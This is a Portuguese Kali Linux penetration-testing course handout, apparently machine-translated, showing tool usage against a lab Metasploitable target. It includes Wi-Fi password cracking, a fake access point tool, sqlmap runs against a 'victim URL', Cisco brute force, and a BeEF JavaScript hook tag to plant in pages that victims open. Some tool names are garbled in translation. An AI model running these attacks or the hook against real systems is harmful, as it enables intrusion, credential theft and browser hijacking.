Você está na página 1de 131

AULA 02

Kali Linux

Por Luiz Alvarenga


Sumário
Kali Linux - Instalação e configuração ........................................................................................... 5
Baixe e instale a caixa virtual ............................................................................................... 5
Instale o Kali Linux ................................................................................................................. 9
Atualização ............................................................................................................................ 12
Configuração do laboratório ............................................................................................... 14
Kali Linux - Ferramentas de coleta de informações .................................................................... 18
NMAP e ZenMAP ................................................................................................................. 18
Stealth Scan .......................................................................................................................... 20
Exploração de pesquisa ...................................................................................................... 22
Ferramentas DNS................................................................................................................. 23
dnsenum.pl ........................................................................................................................ 23
DNSMAP ............................................................................................................................ 25
dnstracer ............................................................................................................................ 26
Ferramentas LBD ................................................................................................................. 26
Hping3 .................................................................................................................................... 27
Kali Linux - Ferramentas de Análise de Vulnerabilidade ............................................................. 29
Ferramentas Cisco ............................................................................................................... 29
Ferramenta de auditoria da Cisco...................................................................................... 30
Exploração global da Cisco ................................................................................................ 31
CAMA ..................................................................................................................................... 31
Kali Linux - Ataques sem fio ........................................................................................................ 33
Fern Wifi Cracker .................................................................................................................. 33
Kismet..................................................................................................................................... 38
GISKismet.............................................................................................................................. 43
Ghost Phisher ....................................................................................................................... 45
Wifite ....................................................................................................................................... 47
Linux Linux - Teste de penetração de sites ................................................................................. 49
Uso Vega ............................................................................................................................... 49
ZapProxy ................................................................................................................................ 56
Uso das Ferramentas de Banco de Dados ...................................................................... 62
sqlmap ................................................................................................................................ 62
sqlninja ............................................................................................................................... 64
Ferramentas de digitalização CMS.................................................................................... 65
WPScan ............................................................................................................................. 65
Joomscan........................................................................................................................... 68
Ferramentas de digitalização SSL ..................................................................................... 69
w3af ........................................................................................................................................ 71
Kali Linux - Ferramentas de exploração ...................................................................................... 73
Metasploit............................................................................................................................... 73
Armitage ................................................................................................................................. 77
Carne ...................................................................................................................................... 80
Sugeridor de exploração do Linux ..................................................................................... 82
Kali Linux - Ferramentas forenses ............................................................................................... 83
p0f ........................................................................................................................................... 83
analisador de pdf .................................................................................................................. 85
Dumpzilla ............................................................................................................................... 85
ddrescue ............................................................................................................................ 86
DFF ......................................................................................................................................... 86
Linux Linux - Engenharia Social ................................................................................................... 88
Uso do Social Engineering Toolkit ..................................................................................... 88
Kali Linux - Ferramentas de estresse........................................................................................... 94
Slowhttptest ........................................................................................................................... 95
Inviteflood............................................................................................................................... 97
Ixxflood ................................................................................................................................... 98
thc-ssl-dos ............................................................................................................................. 99
Kali Linux - Sniffing & Spoofing.................................................................................................. 100
Burpsuite .............................................................................................................................. 100
mitmproxi ............................................................................................................................. 104
Wireshark ............................................................................................................................. 105
sslstrip .................................................................................................................................. 108
Kali Linux - Ferramentas de quebra de senha ........................................................................... 109
Hidra ..................................................................................................................................... 109
Johnny .................................................................................................................................. 111
John ...................................................................................................................................... 114
Rainbowcrack ...................................................................................................................... 115
SQLdict................................................................................................................................. 115
identificador de hash .......................................................................................................... 116
Kali Linux - Mantendo o acesso ................................................................................................. 117
Powersploit .......................................................................................................................... 117
Sbd........................................................................................................................................ 118
Webshells ............................................................................................................................ 119
Weevely ............................................................................................................................... 120
túnel http .............................................................................................................................. 122
dns2tcp ................................................................................................................................. 122
cryptcat ................................................................................................................................. 123
Kali Linux - Engenharia Reversa................................................................................................. 123
OllyDbg................................................................................................................................. 124
dex2jar.................................................................................................................................. 125
jd-gui ..................................................................................................................................... 126
apktool .................................................................................................................................. 127
Kali Linux - Ferramentas de Relatório ....................................................................................... 127
drade..................................................................................................................................... 128
Metagoofil ............................................................................................................................ 130
Kali Linux - Instalação e configuração
O Kali Linux é um dos melhores pacotes de segurança de um hacker ético,
contendo um conjunto de ferramentas divididas pelas categorias. É um código
aberto e sua página oficial é https://www.kali.org.
Geralmente, o Kali Linux pode ser instalado em uma máquina como um sistema
operacional, como uma máquina virtual que discutiremos na seção a
seguir. Instalar o Kali Linux é uma opção prática, pois fornece mais opções para
trabalhar e combinar as ferramentas. Você também pode criar um CD de
inicialização ao vivo ou USB. Tudo isso pode ser encontrado no seguinte
link: https://www.kali.org/downloads/
BackTrack era a versão antiga da distribuição Kali Linux. A versão mais
recente é o Kali 2016.1 e é atualizada com muita frequência.

Para instalar o Kali Linux -

 Primeiro, vamos baixar a caixa Virtual e instalá-la.


 Mais tarde, baixaremos e instalaremos a distribuição do Kali Linux.

Baixe e instale a caixa virtual


Um Virtual Box é particularmente útil quando você deseja testar algo no Kali
Linux do qual não tem certeza. A execução do Kali Linux em uma caixa virtual
é segura quando você deseja experimentar pacotes desconhecidos ou quando
deseja testar um código.
Com a ajuda de um Virtual Box, você pode instalar o Kali Linux no seu sistema
(não diretamente no disco rígido) junto com o sistema operacional principal, que
pode MAC ou Windows ou outro sabor do Linux.
Vamos entender como você pode baixar e instalar a Caixa Virtual no seu
sistema.
Etapa 1- Para fazer o download,
acesse https://www.virtualbox.org/wiki/Downloads . Dependendo do seu
sistema operacional, selecione o pacote certo. Nesse caso, será o primeiro para
Windows, como mostra a captura de tela a seguir.

Etapa 2 - Clique em Avançar .

Etapa 3 - A próxima página oferece opções para escolher o local em que você
deseja instalar o aplicativo. Nesse caso, deixe-o como padrão e clique
em Avançar .
Etapa 4 - Clique em Avançar e a seguinte captura de tela da Instalação
personalizada será exibida. Selecione os recursos que você deseja instalar e
clique em Avançar.

Etapa 5 - Clique em Sim para continuar com a instalação.


Etapa 6 - A tela Pronto para instalar é exibida. Clique em instalar.

Etapa 7 - Clique no botão Concluir .


O aplicativo Virtual Box agora será aberto como mostrado na captura de tela a
seguir. Agora estamos prontos para instalar o restante dos hosts deste manual
e isso também é recomendado para uso profissional.

Instale o Kali Linux


Agora que instalamos com sucesso o Virtual Box, vamos para a próxima etapa
e instale o Kali Linux.
Etapa 1 - Faça o download do pacote Kali Linux em seu site
oficial: https://www.kali.org/downloads/
Etapa 2 - Clique em VirtualBox → Novo, como mostrado na captura de tela a
seguir.

Etapa 3 - Escolha o arquivo de disco rígido virtual certo e clique em Abrir .


Etapa 4 - A seguinte captura de tela é exibida. Clique no botão Criar .

Etapa 5 - Inicie o Kali OS. O nome de usuário padrão é root e a senha é toor .
Atualização
É importante continuar atualizando o Kali Linux e suas ferramentas para as
novas versões, para permanecer funcional. A seguir estão as etapas para
atualizar o Kali.
Etapa 1 - Vá para Aplicativo → Terminal. Em seguida, digite "apt-get update" e
a atualização ocorrerá como mostrado na captura de tela a seguir.
Etapa 2 - Agora, para atualizar as ferramentas, digite "apt-get upgrade" e os
novos pacotes serão baixados.

Etapa 3 - Ele perguntará se você deseja continuar. Digite "Y" e "Enter" .


Etapa 4 - Para atualizar para uma versão mais recente do sistema operacional,
digite "apt-get distupgrade" .

Configuração do laboratório
Nesta seção, configuraremos outra máquina de teste para executar os testes
com a ajuda das ferramentas do Kali Linux.
Etapa 1 - Faça o download do Metasploitable , que é uma máquina
Linux. Pode ser baixado da página oficial
do Rapid7 : https://information.rapid7.com/metasploitabledownload.html?LS=1
631875&CS=web
Etapa 2 - Registre-se fornecendo seus dados. Depois de preencher o formulário
acima, podemos fazer o download do software.

Etapa 3 - Clique em VirtualBox → Novo .


Etapa 4 - Clique em "Usar um arquivo de disco rígido virtual
existente" . Procure o arquivo em que você baixou o Metasploitable e clique
em Abrir .

Etapa 5 - Uma tela para criar uma máquina virtual é exibida. Clique em "Criar".
O nome de usuário padrão é msfadmin e a senha é msfadmin .
Kali Linux - Ferramentas de coleta de
informações
Neste capítulo, discutiremos as ferramentas de coleta de informações do Kali
Linux.

NMAP e ZenMAP
NMAP e ZenMAP são ferramentas úteis para a fase de varredura do Ethical
Hacking no Kali Linux. O NMAP e o ZenMAP são praticamente a mesma
ferramenta, no entanto, o NMAP usa a linha de comando enquanto o ZenMAP
tem uma GUI.
O NMAP é uma ferramenta gratuita para descoberta de rede e auditoria de
segurança. Muitos sistemas e administradores de rede também o consideram
útil para tarefas como inventário de rede, gerenciamento de agendas de
atualização de serviço e monitoramento do tempo de atividade do host ou
serviço.
O NMAP usa pacotes IP brutos de maneiras inovadoras para determinar quais
hosts estão disponíveis na rede, quais serviços (nome e versão do aplicativo)
esses hosts estão oferecendo, quais sistemas operacionais (e versões do SO)
eles estão executando, que tipo de filtro / firewall de pacote estão em uso etc.
Agora, vamos passo a passo e aprendemos a usar o NMAP e o ZenMAP.
Etapa 1 - Para abrir, vá para Aplicativos → 01-Coleta de informações → nmap
ou zenmap.
Etapa 2 - A próxima etapa é detectar o tipo / versão do SO do host de
destino. Com base na ajuda indicada pelo NMAP, o parâmetro de detecção do
tipo / versão do SO é variável "-O". Para mais informações, use este
link: https://nmap.org/book/man-os-detection.html
O comando que vamos usar é -
nmap -O 192.168.1.101
A captura de tela a seguir mostra onde você precisa digitar o comando acima
para ver a saída do Nmap -

Etapa 3 - Em seguida, abra as portas TCP e UDP. Para verificar todas as portas
TCP baseadas no NMAP, use o seguinte comando -
nmap -p 1-65535 -T4 192.168.1.101
Onde o parâmetro “–p” indica todas as portas TCP que precisam ser
verificadas. Nesse caso, estamos analisando todas as portas e "-T4" é a
velocidade da verificação na qual o NMAP deve ser executado.
A seguir estão os resultados. Em verde estão todas as portas abertas do TCP
e em vermelho estão todas as portas fechadas. No entanto, o NMAP não
aparece, pois a lista é muito longa.

Stealth Scan
A varredura furtiva ou SYN também é conhecida como varredura semiaberta ,
pois não conclui o handshake de três vias do TCP. Um hacker envia um pacote
SYN para o destino; se um quadro SYN / ACK for recebido de volta, presume-
se que o destino conclua a conexão e a porta esteja escutando. Se um RST for
recebido de volta do destino, será assumido que a porta não está ativa ou está
fechada.

Agora, para ver a varredura SYN na prática, use o parâmetro –sS no NMAP. A
seguir está o comando completo -
nmap -sS -T4 192.168.1.101
A captura de tela a seguir mostra como usar este comando -
Exploração de pesquisa
O Searchsploit é uma ferramenta que ajuda os usuários do Kali Linux a
pesquisar diretamente com a linha de comando do arquivo de banco de dados
do Exploit.
Para abri-lo, vá para Aplicativos → 08-Exploitation Tools → searchsploit,
conforme mostrado na captura de tela a seguir.
Após abrir o terminal, digite " searchsploit exploit index name ".

Ferramentas DNS
Nesta seção, aprenderemos como usar algumas ferramentas de DNS que o Kali
incorporou. Basicamente, essas ferramentas ajudam nas transferências de
zona ou nos problemas de resolução de IP do domínio.

dnsenum.pl

A primeira ferramenta é o dnsenum.pl, que é um script PERL que ajuda a


conectar MX, A e outros registros a um domínio.
Clique no terminal no painel esquerdo.
Digite “nome de domínio dnsenum” e todos os registros serão
mostrados. Nesse caso, mostra os registros A.
DNSMAP

A segunda ferramenta é o DNSMAP, que ajuda a encontrar os números de


telefone, contatos e outros subdomínios conectados a esse domínio que
estamos pesquisando. A seguir está um exemplo.
Clique no terminal como na seção superior e, em seguida, escreva "dnsmap
domain name"
dnstracer

A terceira ferramenta é o dnstracer , que determina de onde um determinado


DNS (Servidor de Nomes de Domínio) obtém suas informações para um
determinado nome de host.
Clique no terminal como na seção superior e digite "dnstracer domain name" .

Ferramentas LBD
As ferramentas LBD (Detector de balanceamento de carga) são muito
interessantes, pois detectam se um determinado domínio usa DNS e / ou
HTTP. É importante porque se você possui dois servidores, um ou outro pode
não ser atualizado e você pode tentar explorá-lo. A seguir estão as etapas para
usá-lo -
Primeiro, clique no terminal no painel esquerdo.
Em seguida, digite "lbd domainname" . Se produzir um resultado como
"ENCONTRADO", significa que o servidor possui um equilíbrio de carga. Nesse
caso, o resultado é "NÃO ENCONTRADO".

Hping3
O Hping3 é amplamente utilizado por hackers éticos. É quase semelhante às
ferramentas de ping, mas é mais avançado, pois pode ignorar o filtro do firewall
e usar os protocolos TCP, UDP, ICMP e RAW-IP. Possui um modo de
traceroute e a capacidade de enviar arquivos entre um canal coberto.
Clique no terminal no painel esquerdo.
Digite “hping3 –h” que mostrará como usar este comando.

O outro comando é "domínio hping3 ou parâmetro de IP"


Kali Linux - Ferramentas de Análise de
Vulnerabilidade
Neste capítulo, aprenderemos como usar algumas das ferramentas que nos
ajudam a explorar dispositivos ou aplicativos para obter acesso.

Ferramentas Cisco
O Kali possui algumas ferramentas que podem ser usadas para explorar o
roteador Cisco. Uma dessas ferramentas é a tocha Cisco, usada para
digitalização em massa, impressão digital e exploração.
Vamos abrir o console do Terminal clicando no painel esquerdo.
Em seguida, digite “cisco-torch –parameter IP of host” e, se não houver nada
a explorar, o seguinte resultado será mostrado.

Para ver quais são os parâmetros que podem ser usados, digite "cisco-torch?"

Ferramenta de auditoria da Cisco


É um script PERL, que verifica os roteadores Cisco em busca de
vulnerabilidades comuns. Para usá-lo, abra novamente o terminal no painel
esquerdo, como mostrado na seção anterior, e digite “CAT –h hostname ou
IP” .
Você pode adicionar o parâmetro da porta "-p", como mostrado na captura de
tela a seguir, que neste caso é 23 para forçá-lo com força bruta.

Exploração global da Cisco


O Cisco Global Exploiter (CGE) é uma ferramenta de teste de segurança
avançada, simples e rápida. Com essas ferramentas, você pode executar vários
tipos de ataques, conforme mostrado na captura de tela a seguir. No entanto,
tenha cuidado ao testar em um ambiente ativo, pois alguns deles podem travar
o dispositivo da Cisco. Por exemplo, a opção pode parar os serviços.

Para usar esta ferramenta, digite "cge.pl IPaddress number of vulnerability"


A captura de tela a seguir mostra o resultado do teste realizado no roteador
Cisco para a vulnerabilidade número 3 da lista acima. O resultado mostra que
a vulnerabilidade foi explorada com sucesso.

CAMA
O BED é um programa projetado para verificar daemons quanto a possíveis
estouros de buffer, strings de formato, etc. al.

Nesse caso, testaremos a máquina de teste com IP 192.168.1.102 e o protocolo


HTTP.
O comando será "HTTP da cama - t 192.168.1.102" e o teste continuará.
Kali Linux - Ataques sem fio
Neste capítulo, aprenderemos como usar as ferramentas de cracking de Wi-Fi
que o Kali Linux incorporou. No entanto, é importante que a placa sem fio que
você possui seja um modo de monitoramento de suporte.

Fern Wifi Cracker


O cracker Fern Wifi é uma das ferramentas que o Kali precisa quebrar sem fio.
Antes de abrir o Fern, devemos transformar a placa sem fio no modo de
monitoramento. Para fazer isso, digite “airmon-ng start wlan-0” no terminal.
Agora, abra o Fern Wireless Cracker.
Etapa 1 - Aplicativos → Clique em "Ataques sem fio" → "Fern Wireless
Cracker".

Etapa 2 - Selecione a placa Wireless, conforme mostrado na captura de tela a


seguir.
Etapa 3 - Clique em "Procurar pontos de acesso".
Etapa 4 - Após concluir a verificação, ele mostrará todas as redes sem fio
encontradas. Nesse caso, apenas "redes WPA" foram encontradas.
Etapa 5 - Clique em redes WPA, como mostrado na captura de tela acima. Ele
mostra todos os dispositivos sem fio encontrados. Geralmente, em redes WPA,
ele executa ataques de dicionário como tal.
Etapa 6 - Clique em "Procurar" e encontre a lista de palavras a ser usada para
o ataque.

Passo 7 - Clique em "Wifi Attack".


Etapa 8 - Depois de finalizar o ataque do dicionário, encontrou a senha e será
mostrada na imagem a seguir.

Kismet
Kismet é uma ferramenta de análise de rede Wi-Fi. É um sistema de detecção
de rede sem fio, sniffer e detecção de intrusões 802.11 de camada 2. Ele
funcionará com qualquer placa sem fio que suporte o modo de monitoramento
bruto (rfmon) e pode detectar o tráfego 802.11a / b / g / n. Ele identifica as redes
coletando pacotes e também redes ocultas.
Para usá-lo, coloque a placa wireless no modo de monitoramento e, para isso,
digite “airmon-ng start wlan-0” no terminal.
Vamos aprender a usar essa ferramenta.
Etapa 1 - Para iniciá-lo, abra o terminal e digite "kismet".

Etapa 2 - Clique em "OK".


Etapa 3 - Clique em "Sim" quando pedir para iniciar o Kismet Server. Caso
contrário, ele irá parar de funcionar.

Etapa 4 - Opções de inicialização, deixe como padrão. Clique em "Iniciar".

Etapa 5 - Agora, será exibida uma tabela solicitando que você defina a placa
sem fio. Nesse caso, clique em Sim.
Etapa 6 - Nesse caso, a fonte sem fio é "wlan0" . Terá que ser escrito na
seção "Intf" → clique em "Adicionar".

Etapa 7 - Ele começará a cheirar as redes wifi, como mostrado na captura de


tela a seguir.
Etapa 8 - Clique em qualquer rede, produz os detalhes da conexão sem fio,
conforme mostrado na captura de tela a seguir.
GISKismet
O GISKismet é uma ferramenta de visualização sem fio para representar dados
coletados usando o Kismet de maneira prática. O GISKismet armazena as
informações em um banco de dados para que possamos consultar dados e
gerar gráficos usando SQL. Atualmente, o GISKismet usa SQLite para o banco
de dados e arquivos GoogleEarth / KML para gráficos.
Vamos aprender a usar essa ferramenta.
Etapa 1 - Para abrir o GISKismet, vá para: Aplicativos → Clique em "Ataques
sem fio" → giskismet.

Como você se lembra na seção anterior, usamos a ferramenta Kismet para


explorar dados sobre redes sem fio e todos esses pacotes de dados Kismet em
arquivos netXML.
Etapa 2 - Para importar esse arquivo para o Giskismet, digite "root @ kali: ~ #
giskismet -x Kismetfilename.netxml" e ele começará a importar os arquivos.
Depois de importados, podemos importá-los para o Google Earth, os Hotspots
que encontramos anteriormente.
Etapa 3 - Supondo que já instalamos o Google Earth, clique em Arquivo → Abrir
arquivo que o Giskismet criou → Clique em “Abrir”.
O mapa a seguir será exibido.

Ghost Phisher
O Ghost Phisher é uma ferramenta popular que ajuda a criar pontos de acesso
sem fio falsos e, posteriormente, a criar o ataque do homem-no-meio.
Etapa 1 - Para abri-lo, clique em Aplicativos → Ataques sem fio → "phishing
fantasma".
Etapa 2 - Após a abertura, configuraremos o PA falso usando os seguintes
detalhes.

 Entrada de interface sem fio: wlan0


 SSID: nome do ponto de acesso sem fio
 Endereço IP: IP que o AP terá
 WAP: senha que terá esse SSID para conectar
Etapa 3 - Clique no botão Iniciar .

Wifite
É outra ferramenta de clacking sem fio, que ataca várias redes criptografadas
WEP, WPA e WPS seguidas.
Em primeiro lugar, a placa sem fio deve estar no modo de monitoramento.
Etapa 1 - Para abri-lo, vá para Aplicativos → Ataque sem fio → Wifite.
Etapa 2 - Digite "wifite –showb" para procurar as redes.
Etapa 3 - Para começar a atacar as redes sem fio, clique em Ctrl + C.

Etapa 4 - Digite "1" para quebrar a primeira conexão sem fio.

Etapa 5 - Após a conclusão do ataque, a chave será encontrada.

Linux Linux - Teste de penetração de sites


Neste capítulo, aprenderemos sobre os testes de penetração de sites
oferecidos pelo Kali Linux.

Uso Vega
O Vega é um scanner de código aberto e gratuito e uma plataforma de teste
para testar a segurança de aplicativos da web. A Vega pode ajudá-lo a
encontrar e validar Injeção de SQL, XSS (Cross-Site Scripting), informações
confidenciais divulgadas inadvertidamente e outras vulnerabilidades. É escrito
em Java, baseado em GUI e executado no Linux, OS X e Windows.
O Vega inclui um scanner automatizado para testes rápidos e um proxy
interceptador para inspeção tática. O Vega pode ser estendido usando uma API
poderosa no idioma da web: JavaScript. A página oficial
é https://subgraph.com/vega/

Etapa 1 - Para abrir o Vega, vá para Aplicativos → 03-Web Application Analysis


→ Vega

Etapa 2 - Se você não vir um aplicativo no caminho, digite o seguinte comando.

Etapa 3 - Para iniciar uma verificação, clique no sinal "+".


Etapa 4 - Digite o URL da página da web que será digitalizada. Nesse caso, é
uma máquina metaploploável → clique em “Avançar”.
Etapa 5 - Marque todas as caixas dos módulos que você deseja
controlar. Depois, clique em "Next".
Etapa 6 - Clique em "Avançar" novamente na captura de tela a seguir.
Etapa 7 - Clique em "Concluir".
Etapa 8 - Se a seguinte tabela aparecer, clique em "Sim".
A verificação continuará como mostrado na captura de tela a seguir.

Etapa 9 - Após a conclusão da verificação, no painel esquerdo, você poderá ver


todas as descobertas categorizadas de acordo com a gravidade. Se você clicar
nele, verá todos os detalhes das vulnerabilidades no painel direito, como
"Solicitação", "Discussão", "Impacto" e "Remediação".

ZapProxy
O ZAP-OWASP Zed Attack Proxy é uma ferramenta de teste de penetração
integrada fácil de usar para encontrar vulnerabilidades em aplicativos da web. É
uma interface Java.
Etapa 1 - Para abrir o ZapProxy, vá para Aplicativos → 03-Web Application
Analysis → owaspzap.

Etapa 2 - Clique em "Aceitar".


O ZAP começará a carregar.
Etapa 3 - Escolha uma das opções conforme mostrado na captura de tela a
seguir e clique em "Iniciar".
A web a seguir é metaploplo com IP: 192.168.1.101
Etapa 4 - Digite o URL da web de teste em “URL to attack” → clique em “Attack”.

Após a conclusão da verificação, no painel superior esquerdo, você verá todos


os sites rastreados.
No painel esquerdo "Alertas", você verá todas as descobertas junto com a
descrição.
Passo 5 - Clique em "Spider" e você verá todos os links verificados.

Uso das Ferramentas de Banco de Dados


sqlmap

O sqlmap é uma ferramenta de teste de penetração de código aberto que


automatiza o processo de detecção e exploração de falhas de injeção de SQL
e a tomada de controle de servidores de banco de dados. Ele vem com um
poderoso mecanismo de detecção, muitos recursos de nicho para o testador de
penetração final e uma ampla variedade de opções que duram desde
impressões digitais do banco de dados, busca de dados no banco de dados,
acesso ao sistema de arquivos subjacente e execução de comandos no sistema
operacional via conexões de banda.
Vamos aprender a usar o sqlmap.
Etapa 1 - Para abrir o sqlmap, vá para Aplicativos → 04-Database Assessment
→ sqlmap.
A página da Web que possui parâmetros vulneráveis à injeção de SQL é meta-
explorável.

Etapa 2 - Para iniciar o teste de injeção de sql, digite "sqlmap - u URL da


vítima"
Etapa 3 - A partir dos resultados, você verá que algumas variáveis são
vulneráveis.

sqlninja

sqlninja é uma injeção de SQL no Microsoft SQL Server para um acesso GUI
completo. O sqlninja é uma ferramenta direcionada para explorar as
vulnerabilidades de injeção do SQL em um aplicativo Web que usa o Microsoft
SQL Server como back-end. Informações completas sobre esta ferramenta
podem ser encontradas em http://sqlninja.sourceforge.net/
Etapa 1 - Para abrir o sqlninja, vá para Aplicativos → 04-Database Assesment
→ sqlninja.
Ferramentas de digitalização CMS
WPScan

O WPScan é um scanner de vulnerabilidades do WordPress que pode ser


usado para verificar instalações remotas do WordPress e encontrar problemas
de segurança.
Etapa 1 - Para abrir o WPscan, vá para Aplicativos → 03-Web Application
Analysis → “wpscan”.
A captura de tela a seguir é exibida.

Etapa 2 - Para verificar vulnerabilidades em um site, digite "wpscan –u URL


da página da web" .
Se o scanner não for atualizado, ele solicitará a atualização. Eu recomendo
fazê-lo.

Depois que a verificação iniciar, você verá as descobertas. Na captura de tela


a seguir, as vulnerabilidades são indicadas por uma seta vermelha.
Joomscan

O Joomla é provavelmente o CMS mais usado no mercado devido à sua


flexibilidade. Para este CMS, é um scanner Joomla. Isso ajudará os
desenvolvedores e mestres da web a identificar possíveis falhas de segurança
em seus sites Joomla implantados.
Passo 1 - Para abri-lo, basta clicar no painel esquerdo no terminal e, em
seguida, em "joomscan - parameter" .
Etapa 2 - Para obter ajuda para o tipo de uso "joomscan /?"

Etapa 3 - Para iniciar a verificação, digite “joomscan –u URL da vítima”.

Os resultados serão exibidos como mostrado na captura de tela a seguir.


Ferramentas de digitalização SSL
TLSSLed é um script de shell do Linux usado para avaliar a segurança de uma
implementação de servidor da Web SSL / TLS (HTTPS) de destino. Ele é
baseado no sslscan, um completo scanner SSL / TLS baseado na biblioteca
openssl e na ferramenta de linha de comando "openssl s_client" .
Os testes atuais incluem a verificação se o destino suporta o protocolo SSLv2,
a codificação NULL, cifras fracas com base no comprimento da chave (40 ou 56
bits), a disponibilidade de cifras fortes (como AES), se o certificado digital é
assinado MD5 e os recursos atuais de renegociação SSL / TLS.
Para iniciar o teste, abra um terminal e digite "tlssled URL port" . Ele começará
a testar o certificado para encontrar dados.

Você pode ver pela conclusão de que o certificado é válido até 2018, conforme
mostrado em verde na captura de tela a seguir.
w3af
O w3af é uma estrutura de ataque e auditoria de aplicativos da Web que visa
identificar e explorar todas as vulnerabilidades de aplicativos da web. Este
pacote fornece uma interface gráfica do usuário (GUI) para a estrutura. Se você
deseja apenas um aplicativo de linha de comando, instale o w3af-console.
A estrutura foi chamada de "metaploit for the web", mas na verdade é muito
mais, pois também descobre as vulnerabilidades de aplicativos da web usando
técnicas de verificação de caixa preta. O núcleo do w3af e seus plugins são
totalmente escritos em Python. O projeto possui mais de 130 plug-ins, que
identificam e exploram a injeção de SQL, XSS (cross-site scripting), inclusão
remota de arquivos e muito mais.
Etapa 1 - Para abri-lo, vá para Aplicativos → 03-Web Application Analysis →
Clique em w3af.

Etapa 2 - No "Alvo", digite o URL da vítima, que neste caso será o endereço da
web metaploplo.
Passo 3 - Selecione o perfil → Clique em "Iniciar".

Etapa 4 - Vá para "Resultados" e você pode ver a descoberta com os detalhes.


Kali Linux - Ferramentas de exploração
Neste capítulo, aprenderemos sobre as várias ferramentas de exploração
oferecidas pelo Kali Linux.

Metasploit
Como mencionamos anteriormente, o Metasploit é um produto do Rapid7 e a
maioria dos recursos pode ser encontrada na
página www.metasploit.com . Está disponível em duas versões - edição
comercial e gratuita. As diferenças entre essas duas versões não são grandes,
portanto, neste caso, usaremos a versão comunitária (gratuita).
Como um hacker ético, você usará o "Kali Ditribution", que possui a versão da
comunidade Metasploit incorporada, juntamente com outras ferramentas de
hackers éticas que são muito confortáveis, economizando tempo de
instalação. No entanto, se você deseja instalar como uma ferramenta separada,
é um aplicativo que pode ser instalado nos sistemas operacionais como Linux,
Windows e OS X.
Primeiro, abra o Metasploit Console no Kali. Em seguida, vá para Aplicativos →
Ferramentas de exploração → Metasploit.
Após o início, você verá a seguinte tela, onde a versão do Metasploit está
sublinhada em vermelho.
No console, se você usa ajuda ou? símbolo, ele mostrará uma lista com os
comandos do MSP e sua descrição. Você pode escolher com base em suas
necessidades e no que usará.

Outro comando de administração importante é o msfupdate, que ajuda a


atualizar o metasploit com as mais recentes explorações de
vulnerabilidades. Depois de executar este comando no console, você terá que
esperar alguns minutos até que a atualização seja concluída.
Ele possui um bom comando chamado "Pesquisar", que você pode usar para
encontrar o que deseja, conforme mostrado na captura de tela a seguir. Por
exemplo, desejo encontrar explorações relacionadas à Microsoft e o comando
pode ser msf> search name: Microsoft type: exploit .
Onde "pesquisar" é o comando, "nome" é o nome do objeto que estamos
procurando e "tipo" é o tipo de script que estamos procurando.

Outro comando é "info". Ele fornece as informações sobre um módulo ou


plataforma em que é usado, quem é o autor, a referência de vulnerabilidade e
a restrição de carga útil que isso pode ter.
Armitage
A interface gráfica do usuário Armitage para metasploit é uma ferramenta
complementar para o metasploit. Ele visualiza destinos, recomenda
explorações e expõe os recursos avançados de pós-exploração.
Vamos abri-lo, mas primeiro o console metasploit deve ser aberto e
iniciado. Para abrir o Armitage, vá para Aplicativos → Explorar Ferramentas →
Armitage.
Clique no botão Conectar , conforme mostrado na captura de tela a seguir.

Quando abrir, você verá a seguinte tela.


Armitage é fácil de usar. A área "Alvos" lista todas as máquinas que você
descobriu e com as quais está trabalhando. Os alvos hackeados são de cor
vermelha com uma tempestade.
Depois de hackear o alvo, você pode clicar com o botão direito do mouse e
continuar a explorar o que você precisa fazer, como explorar (navegar) nas
pastas.

Na GUI a seguir, você verá a exibição das pastas, chamada console. Apenas
clicando nas pastas, você pode navegar pelas pastas sem a necessidade de
comandos metasploit.
No lado direito da GUI, há uma seção na qual os módulos de vulnerabilidades
estão listados.
Carne
BeEF é a sigla de Browser Exploitation Framework . É uma ferramenta de
teste de penetração que se concentra no navegador da web. O BeEF permite
que o testador de penetração profissional avalie a postura de segurança real de
um ambiente de destino usando vetores de ataque do lado do cliente.
Primeiro, você deve atualizar o pacote Kali usando os seguintes comandos -
root@kali:/# apt-get update
root@kali:/# apt-get install beef-xss
Para iniciar, use o seguinte comando -
root@kali:/# cd /usr/share/beef-xss
root@kali:/# ./beef
Abra o navegador e digite o nome de usuário e a senha: beef .

O gancho do BeEF é um arquivo JavaScript hospedado no servidor BeEF que


precisa ser executado nos navegadores do cliente. Quando isso acontece, ele
volta a chamar o servidor BeEF, comunicando muitas informações sobre o
destino. Ele também permite que comandos e módulos adicionais sejam
executados contra o destino. Neste exemplo, o local do gancho do BeEF está
em http://192.168.1.101:3000/hook.js .
Para atacar um navegador, inclua o gancho JavaScript em uma página que o
cliente exibirá. Existem várias maneiras de fazer isso, mas o mais fácil é inserir
o seguinte em uma página e de alguma forma fazer com que o cliente o abra.
<script src = "http://192.168.1.101:3000/hook.js" type =
"text/javascript"></script>
Quando a página carregar, volte ao Painel de Controle do BeEF e clique em
"Navegadores Online" no canto superior esquerdo. Após alguns segundos,
você verá o seu endereço IP pop-up representando um navegador
conectado. Passar o mouse sobre o IP fornecerá rapidamente informações
como a versão do navegador, o sistema operacional e os plug-ins instalados.
Para executar remotamente o comando, clique no host "Próprio". Em seguida,
no comando, clique no módulo que você deseja executar e, finalmente, clique
em "Executar".

Sugeridor de exploração do Linux


Ele sugere possíveis explorações, dada a versão de lançamento 'uname -r' do
sistema operacional Linux.
Para executá-lo, digite o seguinte comando -
root@kali:/usr/share/linux-exploit-suggester#
./Linux_Exploit_Suggester.pl -k 3.0.0
3.0.0 é a versão do kernel do sistema operacional Linux que queremos explorar.
Kali Linux - Ferramentas forenses
Neste capítulo, aprenderemos sobre as ferramentas forenses disponíveis no
Kali Linux.

p0f
O p0f é uma ferramenta que pode identificar o sistema operacional de um host
de destino simplesmente examinando os pacotes capturados, mesmo quando
o dispositivo em questão está protegido por um firewall de pacotes. P0f não
gera nenhum tráfego de rede adicional, direto ou indireto; nenhuma pesquisa
de nome; sem sondas misteriosas; nenhuma consulta ARIN; nada. Nas mãos
de usuários avançados, o P0f pode detectar a presença do firewall, o uso do
NAT e a existência de balanceadores de carga.
Digite "p0f - h" no terminal para ver como usá-lo e você obterá os seguintes
resultados.
Ele listará até as interfaces disponíveis.

Em seguida, digite o seguinte comando: “p0f –i eth0 –p -o nome do arquivo” .


Onde o parâmetro "-i" é o nome da interface, como mostrado acima. "-
p" significa que está no modo promíscuo. "-o" significa que a saída será salva
em um arquivo.

Abra uma página da web com o endereço 192.168.1.2


A partir dos resultados, você pode observar que o servidor da Web está usando
o apache 2.xe o sistema operacional é o Debian.

analisador de pdf
O analisador de pdf é uma ferramenta que analisa um documento PDF para
identificar os elementos fundamentais usados no arquivo pdf analisado. Não
renderizará um documento PDF. Não é recomendado para estojo de livro de
